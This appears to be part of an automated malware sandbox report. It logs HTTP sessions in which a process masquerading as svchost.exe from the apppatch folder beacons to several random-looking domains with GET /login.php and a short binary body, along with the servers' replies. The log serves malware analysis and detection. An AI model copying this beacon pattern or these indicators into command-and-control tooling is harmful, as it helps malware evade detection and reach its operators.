                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.480647087 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lyvyxor.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.618794918 CEST744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:01 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.401537895 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lyvyxor.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.546242952 CEST744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:51 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.547452927 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lyvyxor.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.662473917 CEST744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:51 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              3192.168.2.44973444.221.84.105806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.956464052 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qetyfuv.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.471368074 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:01 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=aa122ab46703e7e3b9d2518b0ebc8c78|8.46.123.33|1724431621|1724431621|0|1|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              4192.168.2.4497353.64.163.50806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.956649065 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: puzylyp.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.589385986 CEST689INHTTP/1.1 410 Gone
                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:01 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 542
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 30 20 47 6f 6e 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 30 20 47 6f 6e 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.590604067 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: puzylyp.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.778620958 CEST689INHTTP/1.1 410 Gone
                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:01 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 542
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 30 20 47 6f 6e 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 30 20 47 6f 6e 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.411523104 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: puzylyp.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.597188950 CEST689INHTTP/1.1 410 Gone
                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:51 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 542
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 30 20 47 6f 6e 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 30 20 47 6f 6e 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.624247074 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: puzylyp.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.818468094 CEST689INHTTP/1.1 410 Gone
                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:51 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 542
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 30 20 47 6f 6e 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 30 20 47 6f 6e 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              5192.168.2.449736199.191.50.83806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.957045078 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: galyqaz.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:02.071765900 CEST758INHTTP/1.1 302 Found
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:01 GMT
                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                              Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                              Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                                                              Set-Cookie: vsid=926vr471977221402211128; expires=Wed, 22-Aug-2029 16:47:01 GMT; Max-Age=157680000; path=/; domain=galyqaz.com; HttpOnly
                                                                                                                                                                                                              Location: //ww3.galyqaz.com
                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.617531061 CEST306OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: galyqaz.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Cookie: vsid=926vr471977221402211128
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:52.643167973 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:51 GMT
                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                              Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                              Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_NHOnw0G73BscnvIcyf8HaXYxUwB52N5y4R2rV77ldfg6F/P3HTMIgnr4aIPWR/fyPGslgb3huQzNdSH/7sK+hw==
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
